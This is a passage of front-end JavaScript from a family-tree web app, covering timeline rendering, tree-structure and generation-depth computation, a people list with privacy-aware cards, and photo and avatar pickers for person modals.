        // that could affect what appears on the timeline.
        function invalidateTimelineCache() {
            _timelineCache.clear();
        }

        function filterTimelineByPerson() {
            const filterSelect = document.getElementById('timeline-person-filter');
            if (!filterSelect) return;

            const selectedPersonId = filterSelect.value;

            if (!selectedPersonId) {
                // Show all events
                renderTimeline(allTimelineEvents);
            } else {
                // Filter events by person ID
                const filteredEvents = allTimelineEvents.filter(event =>
                    event.personId === parseInt(selectedPersonId)
                );
                renderTimeline(filteredEvents);
            }
        }

        // Render timeline events
        function renderTimeline(events) {
            const eventsDiv = document.getElementById('timeline-events');
            if (!eventsDiv) return;

            // Group events by year. Undated events go into a null bucket
            // rendered with a Tabler pin icon in the bubble instead of the
            // string "Unknown" — the string clipped inside the 64px
            // circular bubble was rendering as "Uknown" (dropped 'n')
            // because "Unknown" overflows the container at text-lg bold.
            const eventsByYear = {};
            events.forEach(event => {
                const key = event.year || '__undated__';
                if (!eventsByYear[key]) eventsByYear[key] = [];
                eventsByYear[key].push(event);
            });

            // Sort years descending; undated bucket sinks to the bottom.
            const years = Object.keys(eventsByYear).sort((a, b) => {
                if (a === '__undated__') return 1;
                if (b === '__undated__') return -1;
                return b - a;
            });

            let html = '';
            years.forEach(year => {
                const bubbleContent = year === '__undated__'
                    ? tablerIcon('pin', { size: 24, preserveColor: true })
                    : year;
                html += `
                    <div class="mb-8">
                        <div class="flex items-center mb-4">
                            <div class="w-16 h-16 rounded-full bg-primary text-white flex items-center justify-center font-bold text-lg z-10 relative flex-shrink-0" title="${year === '__undated__' ? 'Undated events' : escapeHtml(String(year))}">
                                ${bubbleContent}
                            </div>
                            <div class="flex-1 h-0.5 bg-gray-200 ml-4"></div>
                        </div>
                        <div class="ml-20 space-y-4">
                            ${eventsByYear[year].map(event => renderTimelineEvent(event)).join('')}
                        </div>
                    </div>
                `;
            });

            eventsDiv.innerHTML = '<div class="absolute left-8 top-0 bottom-0 w-0.5 bg-gray-300"></div>' + html;
        }

        // Render individual timeline event card
        function renderTimelineEvent(event) {
            const iconNames = {
                birth: 'cake',
                death: 'candle',
                marriage: 'hearts',
                event: 'calendar',
                post: 'notes',
                photo: 'photo'
            };

            const icon = tablerIcon(iconNames[event.type] || 'pin', { size: 20 });
            const date = event.date || (event.month ? `${event.month}/${event.day || ''}` : '');

            // Wire navigation based on event type. Birth/death/marriage events
            // open the related Person's detail page. Post events take the user
            // to the feed (no per-post detail view exists yet). Generic events
            // and any event without a navigable target stay non-interactive —
            // no cursor-pointer affordance.
            let onclick = '';
            if ((event.type === 'birth' || event.type === 'death') && event.personId) {
                onclick = `openPersonFromTimeline(${event.personId})`;
            } else if (event.type === 'marriage' && event.personId) {
                onclick = `openPersonFromTimeline(${event.personId})`;
            } else if (event.type === 'post' && event.postId) {
                onclick = `navigateToView('feed-view')`;
            }
            const clickable = onclick !== '';
            const cardCursor = clickable ? 'cursor-pointer hover:shadow-md' : '';
            const onclickAttr = clickable ? `onclick="${onclick}"` : '';

            return `
                <div class="bg-white rounded-lg shadow-sm border border-gray-200 p-4 transition-shadow ${cardCursor}"
                     ${onclickAttr}>
                    <div class="flex items-start gap-3">
                        <div class="pt-1">${icon}</div>
                        <div class="flex-1 min-w-0">
                            <h4 class="font-semibold text-gray-800">${event.title}</h4>
                            <p class="text-xs mt-1 ${date ? 'text-gray-500' : 'italic'}" ${date ? '' : 'style="color: #9C8770;"'}>
                                ${date || 'Date unknown'}
                            </p>
                            ${event.description ? `<p class="text-sm text-gray-600 mt-2">${escapeHtml(event.description)}</p>` : ''}
                            ${event.location ? `<p class="text-xs text-gray-500 mt-1 inline-flex items-center gap-1">${tablerIcon('map-pin', { size: 14 })} ${escapeHtml(event.location)}</p>` : ''}
                        </div>
                    </div>
                </div>
            `;
        }

        // Called when the user clicks a birth/death/marriage timeline card.
        // Resolves the Person from appState.personsInTree (already loaded by
        // loadFamilyTreeData) and opens person-detail-view. If the person
        // isn't in the local cache (rare), falls back to family-tree-view.
        function openPersonFromTimeline(personId) {
            const person = (appState.personsInTree || []).find(p => p.id === personId);
            if (person) {
                navigateToView('person-detail-view', { person });
            } else {
                navigateToView('family-tree-view');
            }
        }

        // Phase 2.5 T1: build one nested `d3.hierarchy`-compatible object per
        // connected component in the CHILD_OF graph. Marriage / SPOUSE_OF is
        // NOT part of the tree — that's the second render pass (T3).
        //
        // - A "component" is a set of persons connected by CHILD_OF chains.
        //   Each becomes its own subtree with a real root (no synthetic
        //   super-root — per the phase 2.5 brief).
        // - A person's PRIMARY parent (for tree structure) is picked
        //   deterministically: smallest parent id among their CHILD_OF edges.
        //   All other CHILD_OF edges still get rendered as extra parent-child
        //   links (both parents' cards connect down to the child), but only
        //   the primary parent decides the tree structure.
        // - Persons with no in-tree parent (roots) get one entry each. If a
        //   person's parent isn't in the current `persons` snapshot (deleted
        //   / out of scope), they become their own root.
        // - Returns [] when persons is empty.
        function buildParentChildComponents(persons, relationships) {
            if (!persons || persons.length === 0) return [];

            const personIdSet = new Set(persons.map(p => p.id));
            const personById = new Map(persons.map(p => [p.id, p]));

            // For each child, list all their CHILD_OF parents that exist in
            // the current persons snapshot.
            const parentsOf = new Map();
            for (const rel of relationships) {
                if (rel.type !== 'CHILD_OF') continue;
                const childId = rel.from && rel.from.id;
                const parentId = rel.to && rel.to.id;
                if (childId == null || parentId == null) continue;
                if (!personIdSet.has(childId) || !personIdSet.has(parentId)) continue;
                if (!parentsOf.has(childId)) parentsOf.set(childId, []);
                parentsOf.get(childId).push(parentId);
            }

            // Primary parent: prefer the LESS-married parent so half-siblings
            // cluster under their mother (or the non-polygamous side of the
            // union), which lets each union's kids visually attribute to the
            // correct spouse — the T4 polygamous convention. Tiebreak on
            // smallest id for stability.
            const spouseDegree = new Map();
            const spousePairsSeen = new Set();
            relationships.forEach(rel => {
                if (rel.type !== 'SPOUSE_OF') return;
                const aId = rel.from && rel.from.id;
                const bId = rel.to && rel.to.id;
                if (aId == null || bId == null) return;
                const pairKey = [aId, bId].sort((x, y) => x - y).join('-');
                if (spousePairsSeen.has(pairKey)) return;
                spousePairsSeen.add(pairKey);
                spouseDegree.set(aId, (spouseDegree.get(aId) || 0) + 1);
                spouseDegree.set(bId, (spouseDegree.get(bId) || 0) + 1);
            });

            const primaryParentOf = new Map();
            parentsOf.forEach((parents, childId) => {
                const ranked = [...parents].sort((a, b) => {
                    const sa = spouseDegree.get(a) || 0;
                    const sb = spouseDegree.get(b) || 0;
                    if (sa !== sb) return sa - sb;  // fewer spouses first
                    return a - b;                    // tiebreak by id
                });
                primaryParentOf.set(childId, ranked[0]);
            });

            // Union-find on CHILD_OF edges to identify components.
            const parent = new Map(persons.map(p => [p.id, p.id]));
            function find(x) {
                while (parent.get(x) !== x) {
                    parent.set(x, parent.get(parent.get(x)));
                    x = parent.get(x);
                }
                return x;
            }
            function union(a, b) {
                const ra = find(a), rb = find(b);
                if (ra !== rb) parent.set(ra, rb);
            }
            parentsOf.forEach((parents, childId) => {
                parents.forEach(pid => union(childId, pid));
            });

            // Group persons by component root.
            const componentMembers = new Map();
            persons.forEach(p => {
                const root = find(p.id);
                if (!componentMembers.has(root)) componentMembers.set(root, []);
                componentMembers.get(root).push(p.id);
            });

            // Every root candidate in a component gets its own subtree.
            // When a component has multiple roots (e.g. both grandparents of
            // a shared grandchild, or a married-in spouse with no in-tree
            // parent), each is rendered separately — otherwise the extras
            // disappear entirely. This was the initial T1 bug.
            const results = [];
            componentMembers.forEach((memberIds) => {
                let rootCandidates = memberIds.filter(id => !primaryParentOf.has(id));
                if (rootCandidates.length === 0) {
                    // Cycle guard (shouldn't hit with sane data — cousin
                    // marriage or bad edges). Fall back to smallest id.
                    rootCandidates = [Math.min(...memberIds)];
                }
                rootCandidates.sort((a, b) => a - b);

                // Build primary-child adjacency once for the whole component.
                const primaryChildrenOf = new Map();
                const memberSet = new Set(memberIds);
                memberIds.forEach(id => {
                    const pid = primaryParentOf.get(id);
                    if (pid != null && memberSet.has(pid)) {
                        if (!primaryChildrenOf.has(pid)) primaryChildrenOf.set(pid, []);
                        primaryChildrenOf.get(pid).push(id);
                    }
                });

                // Shared visited set across all roots of THIS component —
                // ensures no person renders twice even if two roots' subtrees
                // could reach the same descendant. First-seen wins, which
                // aligns with primary-parent order.
                const visited = new Set();
                function build(personId) {
                    if (visited.has(personId)) return null;
                    visited.add(personId);
                    const p = personById.get(personId);
                    const childIds = primaryChildrenOf.get(personId) || [];
                    childIds.sort((a, b) => a - b);
                    const children = childIds.map(build).filter(Boolean);
                    return { ...p, children };
                }

                rootCandidates.forEach(rootId => {
                    const rootNode = build(rootId);
                    if (rootNode) results.push({ root: rootNode, memberIds });
                });
            });

            return results;
        }

        // Phase 2.5 T15: compute generation depth per person, viewer-relative.
        //
        // We always run this BFS at render time and IGNORE the backend
        // Phase 0 `generation_depth` field — it's backend-BFS from tree
        // roots and can go stale as edges are added / edited. For a
        // viewer-relative FTV, "who's my parent, who's my grandparent"
        // has to be computed from the viewer's Person, not from wherever
        // the graph happens to have a root.
        //
        // BFS from viewer: CHILD_OF up = -1 (parent side), CHILD_OF down =
        // +1 (child side), SPOUSE_OF and SIBLING_OF = 0 (same row).
        // Normalize so the shallowest reached generation lands at depth 0.
        function computeGenerationDepthMap(persons, relationships, viewerPersonId) {
            const depthMap = new Map();
            if (persons.length === 0) return depthMap;

            const adj = new Map();
            persons.forEach(p => adj.set(p.id, []));
            relationships.forEach(rel => {
                const fromId = rel.from && rel.from.id;
                const toId = rel.to && rel.to.id;
                if (fromId == null || toId == null) return;
                if (!adj.has(fromId) || !adj.has(toId)) return;
                if (rel.type === 'CHILD_OF') {
                    adj.get(fromId).push({ neighbor: toId, delta: -1 });
                    adj.get(toId).push({ neighbor: fromId, delta: +1 });
                } else if (rel.type === 'SPOUSE_OF' || rel.type === 'SIBLING_OF') {
                    adj.get(fromId).push({ neighbor: toId, delta: 0 });
                    adj.get(toId).push({ neighbor: fromId, delta: 0 });
                }
            });

            // T8/T14: BFS the viewer's component first so labels are
            // viewer-relative. Then for each unreached person, kick off a
            // NEW BFS from them at depth 0 to fill in their disconnected
            // component's internal generational structure. Without this,
            // disconnected lineages would all pile onto row 0 regardless
            // of their internal parent-child relationships.
            const bfsFrom = (startId) => {
                depthMap.set(startId, depthMap.get(startId) ?? 0);
                const queue = [startId];
                while (queue.length > 0) {
                    const cur = queue.shift();
                    const curDepth = depthMap.get(cur);
                    const neighbors = adj.get(cur) || [];
                    neighbors.forEach(({ neighbor, delta }) => {
                        if (!depthMap.has(neighbor)) {
                            depthMap.set(neighbor, curDepth + delta);
                            queue.push(neighbor);
                        }
                    });
                }
            };

            const anchor = viewerPersonId != null && adj.has(viewerPersonId)
                ? viewerPersonId
                : persons[0].id;
            depthMap.set(anchor, 0);
            bfsFrom(anchor);

            // Second pass: each still-unreached person is a component root
            // for its own BFS. Start at depth 0; the final normalize below
            // shifts everyone into non-negative territory.
            persons.forEach(p => {
                if (!depthMap.has(p.id)) {
                    depthMap.set(p.id, 0);
                    bfsFrom(p.id);
                }
            });

            // Normalize to non-negative — shallowest ancestor = 0, deepest
            // descendant = max.
            let minDepth = Infinity;
            depthMap.forEach(d => { if (d < minDepth) minDepth = d; });
            if (minDepth !== 0 && Number.isFinite(minDepth)) {
                const shifted = new Map();
                depthMap.forEach((d, id) => shifted.set(id, d - minDepth));
                return shifted;
            }
            return depthMap;
        }

        // buildHierarchy (pre-T1) is superseded by buildParentChildComponents
        // above. Removed 2026-07-08 as part of Phase 2.5 T1 landing.

        // Phase 1 list state: cached after each loadFamilyTreeData call so
        // the toolbar handlers (search/sort/filter) can re-render against
        // the latest data without a network round-trip. Also caches user
        // sort+filter prefs per tree id in localStorage.
        function _listPrefsKey(treeId) { return `peopleListPrefs:${treeId || 'unknown'}`; }
        function loadListPrefs(treeId) {
            try {
                const raw = localStorage.getItem(_listPrefsKey(treeId));
                if (!raw) return null;
                return JSON.parse(raw);
            } catch (e) { return null; }
        }
        function saveListPrefs(treeId, prefs) {
            try { localStorage.setItem(_listPrefsKey(treeId), JSON.stringify(prefs)); }
            catch (e) { /* noop */ }
        }

        // Computes the displayed list per the current toolbar state.
        function _computeFilteredPersons(persons, relationships) {
            const searchEl = document.getElementById('people-search');
            const sortEl = document.getElementById('people-sort');
            const filterEl = document.getElementById('people-filter');
            const search = (searchEl?.value || '').trim().toLowerCase();
            const sortBy = sortEl?.value || 'generation';
            const filterBy = filterEl?.value || 'all';

            // Filter by name search.
            let list = persons.filter(p => {
                if (!search) return true;
                const name = `${p.first_name || ''} ${p.last_name || ''}`.toLowerCase();
                return name.includes(search);
            });

            // Filter by toolbar.
            if (filterBy === 'living') {
                list = list.filter(p => !(p.is_alive === false || p.isAlive === false || p.death_year != null));
            } else if (filterBy === 'connected') {
                // Same edge-resolution as B42: viewer's Person is found via
                // represented_by_user_id matching the current Neo4j user id.
                const viewer = persons.find(p =>
                    p.represented_by_user_id != null
                    && String(p.represented_by_user_id) === String(appState.currentUserNeo4jId)
                );
                const viewerId = viewer ? viewer.id : null;
                if (viewerId != null) {
                    const connected = new Set([viewerId]);
                    relationships.forEach(rel => {
                        const fromId = rel.from && rel.from.id;
                        const toId = rel.to && rel.to.id;
                        if (fromId === viewerId) connected.add(toId);
                        if (toId === viewerId) connected.add(fromId);
                    });
                    list = list.filter(p => connected.has(p.id));
                } else {
                    list = []; // no viewer Person → nothing is connected to "me"
                }
            }

            // Sort.
            if (sortBy === 'name') {
                list.sort((a, b) => {
                    const an = `${a.last_name || ''} ${a.first_name || ''}`.toLowerCase();
                    const bn = `${b.last_name || ''} ${b.first_name || ''}`.toLowerCase();
                    return an.localeCompare(bn);
                });
            } else if (sortBy === 'recent') {
                // createdAt may be on the Person directly or absent. Newer first.
                list.sort((a, b) => (b.createdAt || 0) - (a.createdAt || 0));
            } else {
                // generation (default): oldest generation first (lower depth).
                // Floaters (depth 0 with no edges) end up at top; that's OK
                // for v1 — the FTV will treat them differently in Phase 2.
                list.sort((a, b) => {
                    const ad = a.generation_depth ?? 0;
                    const bd = b.generation_depth ?? 0;
                    if (ad !== bd) return ad - bd;
                    // Tiebreak by last name then first name.
                    const an = `${a.last_name || ''} ${a.first_name || ''}`.toLowerCase();
                    const bn = `${b.last_name || ''} ${b.first_name || ''}`.toLowerCase();
                    return an.localeCompare(bn);
                });
            }

            return list;
        }

        // Renders a single card per the mockup #1 4-slot template.
        function _renderPersonCard(person, relationships, personMap) {
            const fullName = `${(person.first_name || '').trim()} ${(person.last_name || '').trim()}${person.suffix ? ' ' + person.suffix : ''}`.trim();
            const displayName = fullName || `Unnamed Person (ID: ${person.id})`;

            // Relationship line — single short string per the mockup:
            // "Spouse: X · N children" for someone with both; "Sister" /
            // "Daughter of X" for sparse cases; "" if nothing meaningful.
            const spouseNames = [];
            let childCount = 0;
            const parents = [];
            relationships.forEach(rel => {
                const fromId = rel.from && rel.from.id;
                const toId = rel.to && rel.to.id;
                if (fromId === person.id && rel.type === 'SPOUSE_OF') {
                    const sp = personMap.get(toId);
                    if (sp) spouseNames.push(`${(sp.first_name || '').trim()} ${(sp.last_name || '').trim()}`.trim());
                } else if (rel.type === 'CHILD_OF' && toId === person.id) {
                    childCount++;
                } else if (rel.type === 'CHILD_OF' && fromId === person.id) {
                    const parent = personMap.get(toId);
                    if (parent) parents.push(parent);
                }
            });
            let relLine = '';
            if (spouseNames.length > 0) {
                const sp = spouseNames[0];
                if (childCount > 0) {
                    relLine = `Spouse: ${sp} · ${childCount} child${childCount > 1 ? 'ren' : ''}`;
                } else {
                    relLine = `Spouse: ${sp}`;
                }
            } else if (childCount > 0) {
                relLine = `${childCount} child${childCount > 1 ? 'ren' : ''}`;
            } else if (parents.length > 0) {
                const p = parents[0];
                const parentName = `${(p.first_name || '').trim()} ${(p.last_name || '').trim()}`.trim();
                relLine = parentName ? `Child of ${parentName}` : '';
            }
            // Truncate at ~32 chars per brief.
            if (relLine.length > 32) relLine = relLine.slice(0, 31) + '…';

            // Phase 3: per-profile privacy. Private profiles show only name,
            // relationship line, initials-only avatar + lock glyph + "Private
            // profile" italic hint in the dates slot.
            //
            // Owner-viewing-own-private (self-view): show the lock badge on the
            // avatar so it's clear at a glance the profile is private to others,
            // but keep the full data (dates/location/photo) rendered.
            const viewerPersonId = appState._ftvViewerPersonId;
            const isPrivateForViewer = personIsPrivate(person)
                && !canViewField(viewerPersonId, person, 'dates');
            const showPrivacyLockBadge = personIsPrivate(person);

            // Dates + optional location.
            const locStr = canViewField(viewerPersonId, person, 'location') ? formatPersonLocation(person) : '';
            const datesHtml = canViewField(viewerPersonId, person, 'dates') ? formatPersonDates(person) : '';
            const isDeceased = person.is_alive === false || person.isAlive === false || person.death_year != null;
            const datesLine = isPrivateForViewer
                ? `<span class="ebw-card-private-hint"><svg class="ebw-lock-glyph" viewBox="0 0 24 24" width="10" height="10" aria-hidden="true"><path fill="currentColor" d="M12 2a5 5 0 00-5 5v3H6a2 2 0 00-2 2v8a2 2 0 002 2h12a2 2 0 002-2v-8a2 2 0 00-2-2h-1V7a5 5 0 00-5-5zm-3 8V7a3 3 0 116 0v3H9z"/></svg> Private profile</span>`
                : (locStr ? `${datesHtml} · ${escapeHtml(locStr)}` : datesHtml);

            // Avatar: profile photo only when viewer can see it; otherwise
            // initials so the private card doesn't reveal a face.
            const showPhoto = canViewField(viewerPersonId, person, 'photo');
            const avatarHtml = (showPhoto && person.profile_photo_url)
                ? `<img src="${escapeHtml(person.profile_photo_url)}" alt="${escapeHtml(displayName)}">`
                : escapeHtml(personInitials(person));
            const avatarStyle = `background: ${personAvatarBg(person)}; color: ${personAvatarColor(person)};`;

            const lockBadge = showPrivacyLockBadge
                ? `<span class="ebw-avatar-lock" aria-label="Private profile" title="Private profile"><svg viewBox="0 0 24 24" width="8" height="8" aria-hidden="true"><path fill="currentColor" d="M12 2a5 5 0 00-5 5v3H6a2 2 0 00-2 2v8a2 2 0 002 2h12a2 2 0 002-2v-8a2 2 0 00-2-2h-1V7a5 5 0 00-5-5zm-3 8V7a3 3 0 116 0v3H9z"/></svg></span>`
                : '';

            // Mirrors Person Detail's showEdit guard — same R1 resource-
            // access basis (tree membership) + same UI-consistency conjunct
            // against the private-card read view. Pre-2026-10-24 this
            // pencil was unguarded, so it rendered on every card even
            // when Person Detail hid the Edit button. Both entry points
            // must agree per ARCHITECTURE.md §4.5 R1 — a stricter
            // affordance is never the enforcement; field privacy on
            // Persons remains presentation-only until SECURITY-SCAN.md
            // open item (server-side field filtering) closes.
            const canEditFromCard = _viewerIsTreeMember(appState.currentTreeId) && !isPrivateForViewer;

            return `
                <div class="ebw-card${isDeceased ? ' ebw-card-rip' : ''}${isPrivateForViewer ? ' ebw-card-private' : ''}" onclick="openPersonDetailById(${person.id})">
                    ${canEditFromCard ? `
                    <button class="ebw-card-edit" aria-label="Edit ${escapeHtml(displayName)}" onclick="event.stopPropagation(); openPersonEditById(${person.id})">
                        <svg width="14" height="14" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M11 5H6a2 2 0 00-2 2v11a2 2 0 002 2h11a2 2 0 002-2v-5m-1.414-9.414a2 2 0 112.828 2.828L11.828 15H9v-2.828l8.586-8.586z"></path>
                        </svg>
                    </button>
                    ` : ''}
                    <div class="ebw-card-row">
                        <div class="ebw-avatar-wrap">
                            <div class="ebw-avatar${isPrivateForViewer ? ' ebw-avatar-private' : ''}" style="${avatarStyle}">${avatarHtml}</div>
                            ${lockBadge}
                        </div>
                        <div class="ebw-card-body">
                            <div class="ebw-card-name">${escapeHtml(displayName)}</div>
                            <div class="ebw-card-dates">${datesLine}</div>
                            ${relLine ? `<div class="ebw-card-relline">${escapeHtml(relLine)}</div>` : ''}
                        </div>
                    </div>
                </div>
            `;
        }

        function renderPeopleList(persons, relationships = []) {
            const peopleCards = document.getElementById('people-cards');
            if (!peopleCards) return;

            // Cache for the toolbar re-render path.
            appState._lastListPersons = persons;
            appState._lastListRelationships = relationships;

            // Restore prefs into the toolbar dropdowns (only on first render
            // per tree — subsequent re-renders just read the live DOM state).
            const treeId = appState.currentTreeId;
            const prefs = loadListPrefs(treeId);
            if (prefs) {
                const sortEl = document.getElementById('people-sort');
                const filterEl = document.getElementById('people-filter');
                if (sortEl && prefs.sort && sortEl.value !== prefs.sort) sortEl.value = prefs.sort;
                if (filterEl && prefs.filter && filterEl.value !== prefs.filter) filterEl.value = prefs.filter;
            }

            if (!persons || persons.length === 0) {
                peopleCards.innerHTML = ebwEmptyState({
                    icon: 'users',
                    heading: 'No family members yet',
                    body: 'Add your first person — a parent, sibling, cousin, ancestor. You can also invite them to join Ebiwawa themselves.',
                    primaryAction: { label: '+ Add Person', onclick: "openAddPersonModal()" },
                    learnMoreAnchor: 'family-tree',
                });
                const footer = document.getElementById('people-footer-count');
                if (footer) footer.textContent = '';
                const tabCount = document.getElementById('members-tab-count');
                if (tabCount) tabCount.textContent = '0';
                return;
            }

            const personMap = new Map(persons.map(p => [p.id, p]));
            const filtered = _computeFilteredPersons(persons, relationships);

            if (filtered.length === 0) {
                peopleCards.innerHTML = '<p class="ebw-empty-state">No matches. Try a different search or filter.</p>';
            } else {
                peopleCards.innerHTML = filtered.map(p => _renderPersonCard(p, relationships, personMap)).join('');
            }

            const footer = document.getElementById('people-footer-count');
            if (footer) {
                footer.textContent = `Showing ${filtered.length} of ${persons.length} family members`;
            }

            // Update the count on the Members tab label. Uses total tree
            // count, not the filtered count — the tab label is a tree-level
            // stat, independent of the toolbar's transient search/filter.
            const tabCount = document.getElementById('members-tab-count');
            if (tabCount) tabCount.textContent = persons.length;
        }

        // Toolbar handler: re-render from cached data + persist user prefs.
        function rerenderPeopleList() {
            const persons = appState._lastListPersons;
            const relationships = appState._lastListRelationships || [];
            if (!persons) return;
            const sortEl = document.getElementById('people-sort');
            const filterEl = document.getElementById('people-filter');
            saveListPrefs(appState.currentTreeId, {
                sort: sortEl?.value || 'generation',
                filter: filterEl?.value || 'all',
            });
            renderPeopleList(persons, relationships);
        }

        // Card click → person detail. Looks up the person object from the
        // cached list rather than serialising it into the onclick attribute
        // (simpler and safer than the JSON.stringify(person) pattern the
        // old code used for the edit button).
        function openPersonDetailById(personId) {
            const persons = appState._lastListPersons || appState.personsInTree || [];
            const person = persons.find(p => p.id === personId);
            if (!person) return;
            navigateToView('person-detail-view', { person });
        }
        function openPersonEditById(personId) {
            const persons = appState._lastListPersons || appState.personsInTree || [];
            const person = persons.find(p => p.id === personId);
            if (!person) return;
            openEditPersonModal(person);
        }

        function openEditPersonModal(person) {
            const modalContainer = document.getElementById('modal-container');
            // Remove any existing edit person modal first — belt against duplicate IDs
            // if this is somehow called before the previous close animation lands.
            const existingModal = document.getElementById('edit-person-modal');
            if (existingModal) {
                existingModal.remove();
            }
            modalContainer.innerHTML += EditPersonModal(person);
            // 2026-09-12 fix (symmetry with Add Person): after the fresh render, force
            // DiceBear picker hidden + clear any lingering photo-removed flag. The
            // template already renders these in the correct state, so this is
            // belt-and-suspenders — but if openEditPersonModal ever becomes
            // render-once (like AddPersonModal), the reset here inherits the fix.
            // Explicitly NOT resetting the preview: fresh template renders it with
            // person.profile_photo_url which is what we want to show.
            const picker = document.getElementById('edit-person-avatar-picker');
            if (picker) picker.classList.add('hidden');
            const form = document.getElementById('edit-person-form');
            if (form) delete form.dataset.photoRemoved;
            openModal('edit-person-modal');
            document.getElementById('edit-person-form')?.addEventListener('submit', handleEditPerson);
        }

        // 2026-09-12: photo pickers for Add Person / Edit Person modals.
        // Off-platform-member profile pics via POST /trees/<id>/person/<id>/photo.
        function handlePersonPhotoPreview(event, previewElId, clearBtnElId) {
            const file = event.target.files && event.target.files[0];
            if (!file) return;
            if (!file.type.startsWith('image/')) {
                alert('Please choose an image file.');
                event.target.value = '';
                return;
            }
            if (file.size > 5 * 1024 * 1024) {
                alert('Image is too large. Maximum size is 5MB.');
                event.target.value = '';
                return;
            }
            const preview = document.getElementById(previewElId);
            const clearBtn = document.getElementById(clearBtnElId);
            const reader = new FileReader();
            reader.onload = (e) => {
                if (preview) {
                    preview.innerHTML = `<img src="${e.target.result}" class="w-full h-full object-cover" alt="Preview">`;
                }
                if (clearBtn) clearBtn.classList.remove('hidden');
            };
            reader.readAsDataURL(file);
        }

        // clearPersonPhotoInput handles two cases:
        // - Add Person: just clears the file input + resets preview to placeholder icon.
        // - Edit Person (markForDelete=true): also flags data-photo-removed="1" on the form
        //   so handleEditPerson knows to fire DELETE /photo after the PUT succeeds.
        function clearPersonPhotoInput(inputElId, previewElId, clearBtnElId, markForDelete) {
            const input = document.getElementById(inputElId);
            const preview = document.getElementById(previewElId);
            const clearBtn = document.getElementById(clearBtnElId);
            if (input) input.value = '';
            if (preview) {
                preview.innerHTML = tablerIcon('user-circle', { size: 40, preserveColor: true, className: 'text-gray-400' });
            }
            if (clearBtn) clearBtn.classList.add('hidden');
            if (markForDelete) {
                const form = document.getElementById('edit-person-form');
                if (form) form.dataset.photoRemoved = '1';
            }
        }

        async function uploadPersonPhoto(treeId, personId, file) {
            const formData = new FormData();
            formData.append('photo', file);
            return apiFetch(`${API_BASE_URL}/trees/${treeId}/person/${personId}/photo`, {
                method: 'POST',
                body: formData,
            });
        }

        async function deletePersonPhoto(treeId, personId) {
            return apiFetch(`${API_BASE_URL}/trees/${treeId}/person/${personId}/photo`, {
                method: 'DELETE',
            });
        }

        // 2026-09-12 fix: modalContainer.innerHTML is set once at renderApp, so
        // AddPersonModal DOM state (preview img, file input .files, clear-btn
        // visibility, DiceBear picker visibility, tree-name collision chip strip
        // for the wizard flow) persists across close→reopen cycles within a
        // single navigation. form.reset() clears field values but doesn't fire
        // change events + doesn't touch our preview/clear-btn/picker state.
        // Call this before opening OR after a successful save to keep the picker
        // fresh. Also good hygiene for the eventual Edit Person case if we ever
        // stop re-rendering that modal per open.
        function _resetPersonPhotoPickerUI(prefix) {
            const input = document.getElementById(`${prefix}-photo-input`);
            const preview = document.getElementById(`${prefix}-photo-preview`);
            const clearBtn = document.getElementById(`${prefix}-photo-clear-btn`);
            const picker = document.getElementById(`${prefix}-avatar-picker`);
            if (input) input.value = '';
            if (preview) {
                preview.innerHTML = tablerIcon('user-circle', { size: 40, preserveColor: true, className: 'text-gray-400' });
            }
            if (clearBtn) clearBtn.classList.add('hidden');
            if (picker) picker.classList.add('hidden');
        }

        // Wrapper for the two "+ Add Person" trigger sites. Resets photo picker
        // state before opening so a previously-picked-but-not-saved photo
        // doesn't ghost into the next open. Delegates to openModal for the
        // actual show. Any future Add Person open site should call this
        // instead of openModal('add-person-modal') directly.
        function openAddPersonModal() {
            _resetPersonPhotoPickerUI('person');
            // Also clear form field values in case the user typed a name +
            // canceled — form.reset() handles fields; the reset above handles
            // the DOM state that survives form.reset().
            const form = document.getElementById('add-person-form');
            if (form) form.reset();
            openModal('add-person-modal');
        }

        // 2026-09-12: DiceBear avatar picker for Person nodes. Reuses the same 8
        // African-name seeds + skin tones as the User avatar picker on onboarding.
        // Prefix is 'person' (Add modal) or 'edit-person' (Edit modal) so IDs align
        // with the file input / preview / clear-btn markup already emitted.
        const _PERSON_DICEBEAR_AVATARS = [
            { seed: 'Amara',   skin: 'd08b5b' },
            { seed: 'Kwame',   skin: '8d5524' },
            { seed: 'Zuri',    skin: 'ae5d29' },
            { seed: 'Olu',     skin: '614335' },
            { seed: 'Nia',     skin: '8d5524' },
            { seed: 'Kofi',    skin: 'ae5d29' },
            { seed: 'Aisha',   skin: '614335' },
            { seed: 'Tendai',  skin: '3c2415' },
        ];

        function _personDiceBearUrl(seed, skin) {
            return `https://api.dicebear.com/7.x/avataaars/svg?seed=${encodeURIComponent(seed)}&skinColor=${encodeURIComponent(skin)}&mouth=default,smile&eyes=default,happy&accessoriesProbability=0`;
        }

        function renderPersonAvatarPickerTiles(prefix) {
            const tiles = _PERSON_DICEBEAR_AVATARS.map(({ seed, skin }) => `
                <div class="cursor-pointer hover:opacity-75 transition-opacity rounded-lg border border-gray-200 hover:border-primary p-1" onclick="pickPersonDiceBearAvatar('${prefix}', '${seed}', '${skin}')">
                    <img src="${_personDiceBearUrl(seed, skin)}" alt="Avatar ${seed}" loading="lazy" decoding="async" class="w-full h-auto rounded">
                </div>
            `).join('');
            return `
                <div class="p-3 bg-gray-50 rounded-lg border border-gray-200">
                    <p class="text-xs text-gray-600 mb-2">Choose an avatar for this family member</p>
                    <div class="grid grid-cols-4 gap-2">${tiles}</div>
                </div>
            `;
        }

        function togglePersonAvatarPicker(pickerId) {
            const el = document.getElementById(pickerId);
            if (!el) return;
            el.classList.toggle('hidden');
        }

        async function pickPersonDiceBearAvatar(prefix, seed, skin) {
            // Fetch the SVG from DiceBear API + wrap as a File, then stuff into the
            // file input via DataTransfer + dispatch 'change'. Downstream code
            // (handlePersonPhotoPreview + upload-on-save) handles the rest, so the
            // DiceBear path is just "another way to fill the file input."
            const inputId = `${prefix}-photo-input`;
            const previewId = `${prefix}-photo-preview`;
            const clearBtnId = `${prefix}-photo-clear-btn`;
            const pickerId = `${prefix}-avatar-picker`;
            try {
                const url = _personDiceBearUrl(seed, skin);
                const resp = await fetch(url);
                if (!resp.ok) throw new Error(`DiceBear fetch failed (${resp.status})`);
                const svgText = await resp.text();
                const file = new File([svgText], `${seed}.svg`, { type: 'image/svg+xml' });
                const input = document.getElementById(inputId);
                if (!input) return;
                // DataTransfer is the standard cross-browser way to programmatically
                // populate a file input's FileList; direct assignment to .files fails
                // in some browsers.
                const dt = new DataTransfer();
                dt.items.add(file);
                input.files = dt.files;
                // Trigger the existing onchange handler so preview updates and any
                // downstream state (clear button visibility) follows the file-picked
                // code path exactly.
                input.dispatchEvent(new Event('change', { bubbles: true }));
